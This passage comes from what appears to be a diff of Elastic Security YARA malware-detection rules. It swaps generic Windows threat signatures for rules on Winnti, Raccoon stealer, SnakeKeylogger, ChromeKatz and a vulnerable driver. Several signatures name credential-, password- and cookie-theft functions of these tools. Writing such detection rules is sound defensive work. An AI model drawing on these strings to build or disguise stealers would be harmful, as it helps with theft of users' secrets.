"32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351" + logic_hash = "87f29b861d5239c60e44541fe31ed90696068225b1b6d824dc9b06fcdb1597ae" score = 75 - quality = 69 - tags = "FILE, MEMORY" - fingerprint = "30afbb04c257c20ccd2cff15f893715187b7e7b66a9c9f09d076d21466e25a57" + quality = 75 + tags = "FILE" + fingerprint = "a1ce2c56e5c99aae124d0404750eb8cc970291e8e10cb0c81c8c618eb778c343" + threat_name = "Windows.VulnDriver.Vmdrv" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 5F 3F 44 4B 4B 66 25 37 2A 5E 70 42 70 } - $a2 = { 71 5A 3E 7D 6F 5D 6E 2D 74 48 5E 55 55 22 3C } - $a3 = { 3E 2D 21 47 45 6A 3C 33 23 47 5B 51 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 6D 00 64 00 72 00 76 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x40]|[\x00-\xff][\x00-\x3f])([\x00-\x1b][\x00-\x27]|[\x00-\xff][\x00-\x26])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x1a][\x00-\x27]|[\x00-\xff][\x00-\x26]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Generic_Threat_54B0Ec47 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Winnti_61215D98 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" author = "Elastic Security" - id = "54b0ec47-79f3-4187-8253-805e7ad102ce" - date = "2024-01-03" - modified = "2024-01-12" + id = "61215d98-f52d-45d3-afa2-4bd25270aa99" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L489-L508" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9c14203069ff6003e7f408bed71e75394de7a6c1451266c59c5639360bf5718c" - logic_hash = "e3d74162a8874fe05042fec98d25b8db50e7f537566fd9f4e40f92bfe868259a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Winnti.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cc1455e3a479602581c1c7dc86a0e02605a3c14916b86817960397d5a2f41c31" + logic_hash = "051cc157f189094d25d45e66e410bdfd61ed7649a4c935d076cec1597c5debf5" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2c3890010aad3c2b54cba08a62b5af6a678849a6b823627bf9e26c8693a89c60" - severity = 50 + fingerprint = "20ee92147edbf91447cca2ee0c47768a50ec9c7aa7d081698953d3bdc2a25320" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 2D 2D 2D 2D 3D 5F 25 73 5F 25 2E 33 75 5F 25 2E 34 75 5F 25 2E 38 58 2E 25 2E 38 58 } - $a2 = { 25 73 2C 20 25 75 20 25 73 20 25 75 20 25 2E 32 75 3A 25 2E 32 75 3A 25 2E 32 75 20 25 63 25 2E 32 75 25 2E 32 75 } + $a = { FF FF FF C9 C3 55 48 89 E5 48 83 EC 30 89 F8 66 89 45 DC C7 45 FC FF FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Acf6222B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Winnti_4C5A1865 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" author = "Elastic Security" - id = "acf6222b-5859-4b18-a770-04f8fc7f48fd" - date = "2024-01-03" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L510-L528" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ce0def96be08193ab96817ce1279e8406746a76cfcf4bf44e394920d7acbcaa6" - logic_hash = "a284b6c163dbc022bd36f19fbc1d7ff70143bee566328ad23e7b8b79abd39e91" + id = "4c5a1865-ff41-445b-8616-c83b87498c2b" + date = "2021-06-28" + modified = "2021-09-16" + reference = "0d963a713093fc8e5928141f5747640c9b43f3aadc8a5478c949f7ec364b28ad" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Winnti.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "69f6dcba59ec8cd7f4dfe853495a35601e35d74476fad9e18bef7685a68ece51" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1046de07f9594a6352a33d892da1b4dc227fdf52a8caf38e8f1532076232c7fc" - severity = 50 + fingerprint = "685fe603e04ff123b3472293d3d83e2dc833effd1a7e6c616ff17ed61df0004c" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 7D 10 00 75 04 33 C0 5D C3 8B 4D 08 8B 55 0C FF 4D 10 74 0E 8A 01 84 C0 74 08 3A 02 75 04 41 42 EB ED 0F B6 01 0F B6 0A 2B C1 5D C3 55 8B EC 83 EC 24 56 57 8B 7D 08 33 F6 89 75 F8 } + $a = { C1 E8 1F 84 C0 75 7B 85 D2 89 D5 7E 75 8B 47 0C 39 C6 7D 6E 44 8D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_5E718A0C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Winnti_6F4Ca425 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" author = "Elastic Security" - id = "5e718a0c-3c46-46f7-adfd-b0c3c75b865f" - date = "2024-01-03" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L530-L548" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "430b9369b779208bd3976bd2adc3e63d3f71e5edfea30490e6e93040c1b3bac6" - logic_hash = "45068afeda7abae0fe922a21f8f768b6c74a6e0f8e9e8b1f68c3ddf92940bf9a" + id = "6f4ca425-5cd2-4c22-b017-b5fc02b3abc2" + date = "2022-01-05" + modified = "2022-01-26" + reference = "161af780209aa24845863f7a8120aa982aa811f16ec04bcd797ed165955a09c1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Winnti.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "a1ffc0e3d27c4bb9fd10f14d45b649b4f059c654b31449013ac06d0981ed25ed" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "b6f9b85f4438c3097b430495dee6ceef1a88bd5cece823656d9dd325e8d9d4a1" - severity = 50 + fingerprint = "dec25af33fc004de3a1f53e0c3006ff052f7c51c95f90be323b281590da7d924" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 44 3A 28 41 3B 3B 30 78 30 30 31 46 30 30 30 33 3B 3B 3B 42 41 29 28 41 3B 3B 30 78 30 30 31 30 30 30 30 33 3B 3B 3B 41 55 29 } + $a = { 89 E5 48 89 7D D8 48 8B 45 D8 0F B6 40 27 0F BE C0 89 45 F8 48 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Fac6D993 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Winnti_De4B0F6E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" author = "Elastic Security" - id = "fac6d993-a9c5-4218-829d-d0f3a3b9a5a0" - date = "2024-01-03" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L550-L568" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e7c88e72cf0c1f4cbee588972fc1434065f7cc9bd95d52379bade1b8520278" - logic_hash = "3486793324dbe43c908432e1956bbbdb870beb4641da46b3786581fd3e78811a" + id = "de4b0f6e-0183-4ea8-9c03-f716a25f1884" + date = "2022-01-05" + modified = "2022-01-26" + reference = "a6b9b3ea19eaddd4d90e58c372c10bbe37dbfced638d167182be2c940e615710" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Winnti.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fb7b0ff4757dfc1ba2ca8585d5ddf14aae03063e10bdc2565443362c6ba37c30" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7502d32cf94496b73e476c7521b84a40426676b335a86bdf1bce7146934efcee" - severity = 50 + fingerprint = "c72eddc2d72ea979ad4f680d060aac129f1cd61dbdf3b0b5a74f5d35a9fe69d7" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 E4 F8 81 EC 4C 04 00 00 53 8B D9 8B 4D 2C 33 C0 89 01 8B 4D 30 56 0F B6 B3 85 00 00 00 89 01 8B 4D 34 57 0F B6 BB 84 00 00 00 89 01 8B 4D 38 89 54 24 10 89 01 8D 44 24 48 50 FF 15 } + $a = { 85 30 FF FF FF 02 00 48 8D 85 30 FF FF FF 48 8D 50 02 0F B7 85 28 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_E7Eaa4Ca : FILE MEMORY +rule ELASTIC_Linux_Virus_Thebe_1Eb5985A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Virus Thebe (Linux.Virus.Thebe)" author = "Elastic Security" - id = "e7eaa4ca-45ee-42ea-9604-d9d569eed0aa" - date = "2024-01-04" - modified = "2024-01-12" + id = "1eb5985a-2b35-434f-81d9-f502dff25397" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L570-L587" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "600da0c88dc0606e05f60ecd3b9a90469eef8ac7a702ef800c833f7fd17eb13e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Virus_Thebe.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "30af289be070f4e0f8761f04fb44193a037ec1aab9cc029343a1a1f2a8d67670" + logic_hash = "7d4bc4b1615048dec1f1fac599afa667e06ccb369bb1242b25887e0ce2a5066a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ede23e801a67bc43178eea87a83eb0ef32a74d48476a8273a25a7732af6f22a6" + fingerprint = "5cf9aa9a31c36028025d5038c98d56aef32c9e8952aa5cd4152fbd811231769e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { C8 F7 C6 A8 13 F7 01 E9 2C 99 08 00 4C 03 D1 E9 } + $a = { 42 31 C9 31 DB 31 F6 B0 1A CD 80 85 C0 0F 85 83 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_97703189 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Chromekatz_Fa232Bba : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Hacktool Chromekatz (Windows.Hacktool.ChromeKatz)" author = "Elastic Security" - id = "97703189-bcac-4b6c-b0d4-9167f5e8085d" - date = "2024-01-04" - modified = "2024-01-12" + id = "fa232bba-07dd-45e0-9ca3-b1465eb9616d" + date = "2024-03-27" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L589-L607" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "968ba3112c54f3437b9abb6137f633d919d75137d790af074df40a346891cfb5" - logic_hash = "318bc82d49e9a3467ec0e0086aaf1092d2aa7c589b5f16ce6fbb3778eda7ef0b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_ChromeKatz.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3f6922049422df14f1a1777001fea54b18fbfb0a4b03c4ee27786bfbc3b8ab87" + logic_hash = "c86291fadd51845cbd7428b159e401d78ac77090e14e34d06bf7bf2018f4502a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9126c3aeaa4ed136424c20aa8e7a487131adc1ae22eb8ab4f514b4687855816f" - severity = 50 + fingerprint = "bf1da659e0de9c4e22851e77878066ae5f4aca75e61b35392887c12e125c91f8" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 5D E9 2A 1C 00 00 8B FF 55 8B EC 8B 45 08 56 8B F1 C6 46 0C 00 85 C0 75 63 E8 6F 29 00 00 89 46 08 8B 48 6C 89 0E 8B 48 68 89 4E 04 8B 0E 3B 0D 98 06 49 00 74 12 8B 0D B4 05 49 00 85 } + $s1 = "CookieKatz.exe" + $s2 = "Targeting Chrome" + $s3 = "Targeting Msedgewebview2" + $s4 = "Failed to find the first pattern" + $s5 = "WalkCookieMap" + $s6 = "Found CookieMonster on 0x%p" + $s7 = "Cookie Key:" + $s8 = "Failed to read cookie value" wide + $s9 = "Failed to read cookie struct" wide + $s10 = "Error reading left node" condition: - all of them + 5 of them } -rule ELASTIC_Windows_Generic_Threat_Ca0686E1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Snakekeylogger_Af3Faa65 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Snakekeylogger (Windows.Trojan.SnakeKeylogger)" author = "Elastic Security" - id = "ca0686e1-001f-44d2-ae2f-51c473769723" - date = "2024-01-05" - modified = "2024-01-12" + id = "af3faa65-b19d-4267-ac02-1a3b50cdc700" + date = "2021-04-06" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L609-L627" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "15c7ce1bc55549efc86dea74a90f42fb4665fe15b14f760037897c772159a5b5" - logic_hash = "12b2ff66d1be6e2d27f24489b389b5c84660921e8de41653b2b425077cc87669" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SnakeKeylogger.yar#L1-L32" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "54180a642d40b5366f1b400c347c25dc31397d662d6bb8af33c7d2319c97d3fb" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "4663eefedb6f3f502adfb4f64278d1c535ba3a719d007a280e9943914121cd81" - severity = 50 + fingerprint = "15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 53 8B 5D 08 56 57 8B F9 8B 77 10 8B C6 2B C3 89 75 FC 3B 45 0C 72 03 8B 45 0C 83 7F 14 10 72 02 8B 0F 8D 14 19 2B F0 8B CE 03 C2 2B CB 41 51 50 52 E8 62 1A 00 00 83 C4 0C 8B CF 56 } + $a1 = "get_encryptedPassword" ascii fullword + $a2 = "get_encryptedUsername" ascii fullword + $a3 = "get_timePasswordChanged" ascii fullword + $a4 = "get_passwordField" ascii fullword + $a5 = "set_encryptedPassword" ascii fullword + $a6 = "get_passwords" ascii fullword + $a7 = "get_logins" ascii fullword + $a8 = "GetOutlookPasswords" ascii fullword + $a9 = "StartKeylogger" ascii fullword + $a10 = "KeyLoggerEventArgs" ascii fullword + $a11 = "KeyLoggerEventArgsEventHandler" ascii fullword + $a12 = "GetDataPassword" ascii fullword + $a13 = "_encryptedPassword" ascii fullword + $b1 = "----------------S--------N--------A--------K--------E----------------" + $c1 = "SNAKE-KEYLOGGER" ascii fullword condition: - all of them + 8 of ($a*) or #b1>5 or #c1>5 } -rule ELASTIC_Windows_Generic_Threat_97C1A260 : FILE MEMORY +rule ELASTIC_Windows_Trojan_M0Yv_92F66467 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan M0Yv (Windows.Trojan.M0yv)" author = "Elastic Security" - id = "97c1a260-9b43-458e-a9ac-2391aee1bcb8" - date = "2024-01-07" - modified = "2024-01-12" + id = "92f66467-89fd-4501-b045-3c6aed6c82f9" + date = "2023-05-03" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L629-L647" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2cc85ebb1ef07948b1ddf1a793809b76ee61d78c07b8bf6e702c9b17346a20f1" - logic_hash = "5bd84cbdd4ba699c9e9d87e684071342b23138538bd83ffea8c524fcee26a59b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_M0yv.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0004d22dd18c0239b722c085101c0a32b967159e2066a0b7b9104bb43f5cdea0" + logic_hash = "a47b20679aee9559213de22783cfbc55c6091785e4dc288349963e863b78cf41" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "9cd93a8def2d2fac61a5b37d82b97c18ce8bf3410aa6ec7531ec28378f5c98cc" - severity = 50 + fingerprint = "2afebc9478fbad18b74748794773cae9be3a4eac599d657bab5a7f8de331ba41" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 53 56 57 E8 14 31 00 00 8B F0 85 F6 0F 84 39 01 00 00 8B 16 33 DB 8B CA 8D 82 90 00 00 00 3B D0 74 0E 8B 7D 08 39 39 74 09 83 C1 0C 3B C8 75 F5 8B CB 85 C9 0F 84 11 01 00 00 8B 79 } + $a1 = { 54 65 7D 41 69 6E 63 5D 6A 68 6D } + $a2 = { 4E 73 4D 62 62 77 61 6E 66 77 58 72 61 72 64 6C 7D } + $a3 = { 40 65 7D 41 69 6E 63 48 77 71 7A 69 66 74 75 67 7A 55 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_A440F624 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Snowlight_F5C83D35 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Snowlight (Linux.Trojan.Snowlight)" author = "Elastic Security" - id = "a440f624-c7ec-4f26-bfb5-982bae5f6887" - date = "2024-01-07" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L649-L668" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3564fec3d47dfafc7e9c662654865aed74aedeac7371af8a77e573ea92cbd072" - logic_hash = "23c759a0db5698b28a69232077a6b714f71e8eaa069d2f02a7d3efc48b178a2b" + id = "f5c83d35-aaa5-4356-b4e7-93dc19c0c6b1" + date = "2024-05-16" + modified = "2024-06-12" + reference = "https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Snowlight.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7d6652d8fa3748d7f58d7e15cefee5a48126d0209cf674818f55e9a68248be01" + logic_hash = "fef8f44e897a0f453be2f84d28886d27e261f8256c53c0425c5265b138ce5f40" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0f538f8f4eb2e71fb74d8305a179fc2ad880ab5a4cfd37bd35b5da2629ed892c" - severity = 50 + fingerprint = "89adbef703bec7c41350e97141d414535f5935c6c6957a0f8b25e07f405ea70e" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 2E 20 49 50 20 3D 20 25 73 2C 20 50 6F 72 74 20 3D 20 25 64 2C 20 73 6B 20 3D 20 25 64 } - $a2 = { 2E 20 49 50 20 3D 20 25 73 2C 20 50 6F 72 74 20 3D 20 25 64 2C 20 4C 65 6E 20 3D 20 25 64 } + $a = { 48 83 EC 08 48 8B 05 A5 07 20 00 48 85 C0 74 05 E8 BB 00 00 00 48 83 C4 08 C3 00 00 00 00 00 00 FF 35 9A 07 20 00 FF 25 9C 07 20 00 0F 1F 40 00 FF 25 9A 07 20 00 68 00 00 00 00 E9 E0 FF FF FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B577C086 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Raccoon_Af6Decc6 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Raccoon (Windows.Trojan.Raccoon)" author = "Elastic Security" - id = "b577c086-37bd-4227-8cde-f15e2ce0d0ae" - date = "2024-01-07" - modified = "2024-01-12" + id = "af6decc6-f917-4a80-b96d-1e69b8f8ebe0" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L670-L688" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "27dd61d4d9997738e63e813f8b8ea9d5cf1291eb02d20d1a2ad75ac8aa99459c" - logic_hash = "a7684340171415ee01e855706192cdffcccd6c82362707229b2c1d096f87dfa8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Raccoon.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe09bef10b21f085e9ca411e24e0602392ab5044b7268eaa95fb88790f1a124d" + logic_hash = "50ec446e8fd51129c7333c943dfe62db099fe1379530441f6b102fcbe3bc0dbd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0de3cab973de067f2c10252bf761ced353de57c03c4b2e95db05ee3ca30259ea" - severity = 50 + fingerprint = "f9314a583040e4238aab7712ac16d7638a3b7c9194cbcf2ea9b4516c228c546b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 24 83 7D 08 00 75 0A B8 9A FF FF FF E9 65 02 00 00 8B 45 08 89 45 FC 8B 4D FC 83 79 18 00 75 0A B8 9A FF FF FF E9 4C 02 00 00 8B 55 FC 83 7A 7C 00 74 0C 8B 45 08 50 E8 5F 06 00 } + $a1 = "A:\\_Work\\rc-build-v1-exe\\json.hpp" wide fullword + $a2 = "\\stealler\\json.hpp" wide fullword condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_62E1F5Fc : FILE MEMORY +rule ELASTIC_Windows_Trojan_Raccoon_58091F64 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Raccoon (Windows.Trojan.Raccoon)" author = "Elastic Security" - id = "62e1f5fc-325b-46e0-8c03-1a73e873ab16" - date = "2024-01-07" - modified = "2024-01-12" + id = "58091f64-2118-47f8-bcb2-407a3c62fa33" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L690-L710" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4a692e244a389af0339de8c2d429b541d6d763afb0a2b1bb20bee879330f2f42" - logic_hash = "76e21746ee396f13073b3db1e876246f01cef547d312691dff3dc895ea3a2b82" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Raccoon.yar#L22-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe09bef10b21f085e9ca411e24e0602392ab5044b7268eaa95fb88790f1a124d" + logic_hash = "8a7388e9c3dd0dd1a79215dbabcd964a0afa883490611afb6bb500635fbfff9a" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "64839df90109a0c706c0a3626ba6c4c2eaa5dcd564f0e9889ab9ad4f12e150fe" - severity = 50 + fingerprint = "ea819b46ec08ba6b33aa19dcd6b5ad27d107a8e37f3f9eb9ff751fe8e1612f88" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 43 6C 69 65 6E 74 2E 48 61 6E 64 6C 65 5F 50 61 63 6B 65 74 } - $a2 = { 67 65 74 5F 73 45 78 70 59 65 61 72 } - $a3 = { 73 65 74 5F 73 45 78 70 59 65 61 72 } + $a = { 74 FF FF FF 10 8D 4D AC 53 6A 01 8D 85 60 FF FF FF 0F 43 85 60 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_55D6A1Ab : FILE MEMORY +rule ELASTIC_Windows_Trojan_Raccoon_Deb6325C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Raccoon (Windows.Trojan.Raccoon)" author = "Elastic Security" - id = "55d6a1ab-2041-44a5-ae0e-23671fa2b001" - date = "2024-01-07" - modified = "2024-01-12" + id = "deb6325c-5556-44ce-a184-6369105485d5" + date = "2022-06-28" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L712-L731" - license_url = 